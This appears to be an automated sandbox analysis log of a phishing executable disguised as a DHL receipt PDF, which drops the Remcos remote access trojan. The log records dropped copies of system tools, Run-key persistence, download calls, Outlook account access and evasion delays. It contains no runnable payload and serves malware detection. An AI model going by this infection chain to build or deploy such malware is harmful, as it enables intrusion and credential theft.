Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: edputil.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: urlmon.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: srvcli.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: appresolver.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: bcp47langs.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: slc.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: pcacli.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: apphelp.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: version.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: archiveint.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: url.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: ieframe.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: iertutil.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: netapi32.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: userenv.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: winhttp.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: wkscli.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: netutils.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: wldp.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: propsys.dll
Source: C:\ProgramData\Remcos\remcos.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\xkn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: DHL119040 receipt document,pdf.exe Static file information: File size 1390592 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr

Data Obfuscation

Source: C:\Users\Public\Libraries\yfkwifxL.pif Unpacked PE file: 1.2.yfkwifxL.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: yfkwifxL.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
Source: alpha.exe.6.dr Static PE information: section name: .didat
Source: per.exe.14.dr Static PE information: section name: .imrsiv
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx 0_2_028BD2E9
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA2FC push 028CA367h; ret 0_2_028CA35F
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A32FC push eax; ret 0_2_028A3338
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A635A push 028A63B7h; ret 0_2_028A63AF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A635C push 028A63B7h; ret 0_2_028A63AF
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B3003 push 028B3051h; ret 0_2_028B3049
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B3004 push 028B3051h; ret 0_2_028B3049
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CB1A4 pushad ; retf 0_2_028CB1A5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A674E push 028A6792h; ret 0_2_028A678A
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A6750 push 028A6792h; ret 0_2_028A678A
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AC504 push ecx; mov dword ptr [esp], edx 0_2_028AC509
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AD538 push 028AD564h; ret 0_2_028AD55C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028ACB84 push 028ACD0Ah; ret 0_2_028ACD02
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B78A4 push 028B7921h; ret 0_2_028B7919
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AC8B2 push 028ACD0Ah; ret 0_2_028ACD02
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B68DE push 028B698Bh; ret 0_2_028B6983
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B68E0 push 028B698Bh; ret 0_2_028B6983
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028C9874 push 028C9A60h; ret 0_2_028C9A58
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CDE98 push eax; ret 0_2_028CDF68
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EBB push 028B9EF4h; ret 0_2_028B9EEC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EBC push 028B9EF4h; ret 0_2_028B9EEC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B2EF8 push 028B2F6Eh; ret 0_2_028B2F66
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B5E14 push ecx; mov dword ptr [esp], edx 0_2_028B5E16
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7F18 push 028B7F50h; ret 0_2_028B7F48
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7C7C push 028B7CBEh; ret 0_2_028B7CB6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74E56 push ecx; ret 0_2_2DA74E69
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA97A28 push eax; ret 0_2_2DA97A46
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA9B132 push esp; ret 0_2_2DA9B141

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\Users\Public\Libraries\yfkwifxL.pif
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\per.exe
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA46EB0 ShellExecuteW,URLDownloadToFileW, 0_2_2DA46EB0
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\ProgramData\Remcos\remcos.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe

Boot Survival

barindex
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfiwkfy Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe Jump to dropped file
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe Jump to dropped file
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5AB0D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5 Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_028B9EF8
Source: C:\ProgramData\Remcos\remcos.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\yfkwifxL.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX (68 identical entries)
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BCD74 0_2_028BCD74
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4F7A7 Sleep,ExitProcess, 0_2_2DA4F7A7
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AF7A7 Sleep,ExitProcess, 5_2_2D5AF7A7
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: c:\users\public\xkn.exe Key value queried: Powershell behavior
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\xkn.exe Memory allocated: 151BB7A0000 memory reserve | memory write watch
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 20_2_0040DD85
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5A748
Source: C:\ProgramData\Remcos\remcos.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 5_2_2D5BA748
Source: C:\Users\Public\xkn.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\yfkwifxL.pif Window / User API: threadDelayed 387 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 3512 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Window / User API: threadDelayed 6349 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe Window / User API: foregroundWindowGot 1739 Jump to behavior
Source: C:\Users\Public\xkn.exe Window / User API: threadDelayed 1934
Source: C:\Users\Public\alpha.exe API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe API coverage: 8.1 %
Source: C:\Users\Public\Libraries\yfkwifxL.pif TID: 7480 Thread sleep count: 387 > 30 Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe TID: 8008 Thread sleep time: -1756000s >= -30000s Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe TID: 8008 Thread sleep time: -3174500s >= -30000s Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7952 Thread sleep count: 1934 > 30
Source: C:\Users\Public\xkn.exe TID: 7956 Thread sleep count: 149 > 30
Source: C:\Users\Public\xkn.exe TID: 8056 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_028A58B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 0_2_2DA4BD37
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4783C FindFirstFileW,FindNextFileW, 0_2_2DA4783C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 0_2_2DA4880C
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA59AF5 FindFirstFileW,FindNextFileW,FindNextFileW, 0_2_2DA59AF5
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49665
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 0_2_2DA4C34D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 0_2_2DA5C291
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA49253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 0_2_2DA49253
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_45BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 5_2_45BC10F1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AC34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 5_2_2D5AC34D
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 5_2_2D5ABD37
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A9665 FindFirstFileW,FindNextFileW,FindClose,FindClose, 5_2_2D5A9665
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A880C FindFirstFileW,FindNextFileW,FindClose, 5_2_2D5A880C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5A783C FindFirstFileW,FindNextFileW, 5_2_2D5A783C
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5ABB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 5_2_2D5ABB30
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5B9AF5 FindFirstFileW, 5_2_2D5B9AF5
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 5_2_2D5BC291
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689C2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove, 7_2_00007FF7689C2978
Source: C:\Users\Public\alpha.exe Code function: 7_2_00007FF7689B35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose, 7_2_00007FF7689B35B8
